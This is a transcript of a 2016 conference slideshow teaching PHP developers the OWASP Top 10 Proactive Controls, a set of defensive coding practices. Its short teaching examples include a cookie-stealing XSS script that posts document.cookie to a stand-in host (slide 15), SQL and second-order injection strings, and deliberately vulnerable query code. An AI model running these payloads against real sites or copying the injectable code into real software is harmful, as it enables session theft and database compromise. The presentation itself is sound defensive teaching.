Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

OWASP Top 10 Proactive Controls

929 views

Published on

Cyber attacks are a real and growing threat to businesses and an increasing number of attacks take place at application layer. The best defence against is to develop applications where security is incorporated as part of the software development lifecycle.

The OWASP Top 10 Proactive Controls project is designed to integrate security in the software development lifecycle. In this special presentation for PHPNW, based on v2.0 released this year, you will learn how to incorporate security into your software projects.

Recommended to all developers who want to learn the security techniques that can help them build more secure applications.

Published in: Technology
  • Be the first to comment

OWASP Top 10 Proactive Controls

  1. 1. OWASP Top 10 Proactive Controls Katy Anton @katyanton October 2016 1 PHPNW16
  2. 2. OWASP Top 10 Risks - 2013 A1 - Injection A2 - Broken Authentication and Session Management A3 - Cross Site Scripting ( XSS ) A4 - Insecure Direct Object References A5 - Security Misconfiguration A6 - Sensitive Data Exposure A7 - Missing Function Level Access Control A8 - Cross-Site Request Forgery (CSRF) A9 - Using Components with Known Vulnerabilities A10- Unvalidated Redirects and Forwards 2
  3. 3. Katy Anton • Software development background • Certified Secure Software Lifecycle Professional (CSSLP) • Application Security Consultant @Veracode • OWASP Bristol Chapter Leader • Project Co-Leader for OWASP Top 10 Proactive Controls @katyanton https://www.linkedin.com/in/katyanton
  4. 4. Cyber attacks 2015 - 2016 4 Symfony implementation Disclosure of information SQL Injection
  5. 5. New Website 5
  6. 6. OWASP Application Security Verification Standard (ASVS) 6
  7. 7. C1. Verify for Security Early and Often 7 • Choose the level of security for your application • Security requirements and tests - OWASP ASVS • Verify for Security Early and Often (OWASP ZAP - continuous integration )
  8. 8. 8 Proactive Control Risks prevented C1.Verify for security early and often All OWASP Top 10 Risks!
  9. 9. SQL injection example 9 $email=‘;- - @owasp.org; $sql = UPDATE user set email=‘$email’ WHERE id=‘1’; $sql = UPDATE user SET email=‘'; -- @owasp.org' WHERE id=‘1’; Becomes
  10. 10. C2. Parameterize Queries 10 Parameterize Queries prevent untrusted input from being interpreted as part of a SQL command.
  11. 11. PHP: <?php $stmt = $dbh->prepare(”Update users set email = $_GET[‘email’] where id=$id”); $stmt->execute(); Example of Query Parametrisation C2. Control: Data Access Layer 11 How not to do it !
  12. 12. C2: How NOT to $sql = ”Update users set email=$_GET[‘email’] where id=$id” This one string combines both the code and the input. SQL parser cannot differentiate between code and user input. 12
  13. 13. C2. Control: Data Access Layer 13 PHP: Query Parametrization - Correct Usage <?php $stmt = $dbh->prepare(”Update users set email=:new_email where id=:user_id”); $stmt->bindParam(':new_email', $email’); $stmt->bindParam(':user_id', $id); $stmt->execute();
  14. 14. 14 Proactive Control Risks prevented C2.Parameterize Queries A1. Injection
  15. 15. XSS example 15 <script type=“text/javascript”> var adr = ‘http://evilwebsite.com/send.php?cakemonster =‘ + escape(document.cookie); var img = new Image(); img.src = adr; </script>
  16. 16. C3. Encode Your Output 16
  17. 17. C3: Controls - Contextual Encoding Symfony 2+ Twig ZF2 ZendEscaper 17
  18. 18. 18 Proactive Control Risks prevented C3. Encode Output A1. Injection A3. XSS
  19. 19. C4. Validate All Input 19
  20. 20. C4: Example of Validations 20 • GET / POST data (including hidden fields ) • File uploads • HTTP Headers • Cookies • Database
  21. 21. C4: Controls 21 PHP filter extension, available as standard since v5.2 Example of both validation and sanitisation : <?php $sanitised_url = filter_var($url, FILTER_SANITIZE_URL); if (filter_var($sanitised_url, FILTER_VALIDATE_URL)) { echo “This is a valid URL.”; }
  22. 22. Input Validation Prevents 2nd Order SQL Injection Register form • Two users : “john” and “john’ - - “ • Username value “john’ –-” becomes the sql injection payload 22 john’- -Username Password
  23. 23. Change password form: Logged as john’ - - 2nd Order SQL Injection Example 23 Current Password New Password New Password
  24. 24. 2nd Order SQL Injection Example UPDATE users SET password='123 ' WHERE username='john'--' and password=‘abc' UPDATE users SET password='123 ' WHERE username='john' 24 Becomes
  25. 25. 25 Proactive Control Risks prevented C4. Validate All Input A1. Injection A3. XSS A10. Unvalidated redirects & forwards
  26. 26. New Website 26 C1 Verify for Security Early and Often C3 Encode Data C4 Validate Input C2 Parametrize Queries
  27. 27. C5. Implement Identity and Authentication Control 27
  28. 28. C5: Best practices • Secure Password Storage • Multi-Factor Authentication • Secure Password Recovery Mechanism • Transmit sensitive data only over TLS (v1.2) • Error Messages • Prevent Brute-Force Attacks 28
  29. 29. C5. PHP Password storage • password_hash(“my_password”) • since php v5.5 • compatibility library for versions <5.5 29
  30. 30. C5. Password storage – How Not To $password=bcrypt([salt] + [password], work_factor); $loginkey =md5(lc([username]).”::”.lc([password])) Be consistent when storing sensitive data! 30
  31. 31. C5. Forgot Password Forgot password design: 1). Ask one or more security questions 2). Send the user a randomly generated token 3). Verify token in same web session. 4). Change password. Resources https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet 31
  32. 32. Error message for valid user Error messages = be identical on both HTTP and HTML. How not to do it ! Error message for not-registered user C5. Error messages 32
  33. 33. 33 Proactive Control Risks prevented C5. Establish Identity and Authentication Controls A2. Broken Authentication and Session Management
  34. 34. C6. Implement Appropriate Access Controls 34
  35. 35. C6: Best Practices • Deny by default • Least privilege • Force all requests to go through access control checks • Check on the server when each function is accessed 35
  36. 36. C6: Role vs Resource based ACLs Resource based if (user.isPermitted("project:view:123")) { //show the project report button } else { //don't show the button } 36 Role based if (user.hasRole("Project Manager") ) { //show the project report button } else { //don't show the button } if (user.hasRole("Project Manager") || user.hasRole("Admin") ) { //show the project report button } else { //don't show the button }
  37. 37. 37 Proactive Control Risks prevented C6: Implement Appropriate Access Controls A4. Insecure Direct Object References A7. Missing Function Level Access Control
  38. 38. C7. Protect Data 38
  39. 39. C7 Controls: Data in transit Data in transit: HTTPS • Confidentiality: Spy cannot view your data • Integrity: Spy cannot change your data • Authenticity: Server you visit is the right one 39 MITM Protection - HSTS • HTTPS + Strict Transport Security Header
  40. 40. C7 Controls: Data at rest 1. Algorithm •AES (Advanced Encryption Standard ) 2. Secure key management 3. Adequate access controls and auditing 40
  41. 41. 41 Proactive Control Risks prevented C7: Protect Data A6. Sensitive Data Exposure
  42. 42. New Website 42 C1 Verify for Security Early and Often C3 Encode Data C4 Validate Input C6 Access Controls C5 Authentication C7 Protect Data C2 Parametrize Queries
  43. 43. C8. Implement Logging and Intrusion Detection 43
  44. 44. 44 Proactive Control Risks prevented C8.Logging and Intrusion Detection All OWASP Top 10 Risks!
  45. 45. C9. Leverage Security Frameworks and Libraries 45
  46. 46. C9: Examples • Framework with CSRF protection • Framework with XSS protection • ORM - SQL injection prevention • Vetted Cryptographic algorithm 46
  47. 47. C9: Best Practices  Use trusted sources  Low-coupling (Low-coupling == reduced attack surface)  Update regularly / replace 47
  48. 48. 48 Proactive Control Risks prevented C9. Leverage Security All OWASP Top 10 Risks!
  49. 49. C10. Error and Exception Handling 49
  50. 50. C10: Best Practices  Centralised error handling  Verbose enough to explain the issue  Don’t leak critical information 50
  51. 51. 51 Proactive Control Risks prevented C10. Error and Exception Handling All OWASP Top 10 Risks!
  52. 52. New Website 52 C1 Verify for Security Early and Often C3 Encode Data C4 Validate Input C6 Access Controls C5 Authentication C7 Protect Data C10 Error Handling C8 Logging C2 Parametrize Queries C9 Leverage security
  53. 53. It’s a Start To Secure Software by Default! 53
  54. 54. Reference OWASP Proactive Controls Project: https://www.owasp.org/index.php/OWASP _Proactive_Controls 54
  55. 55. Thank you 55

×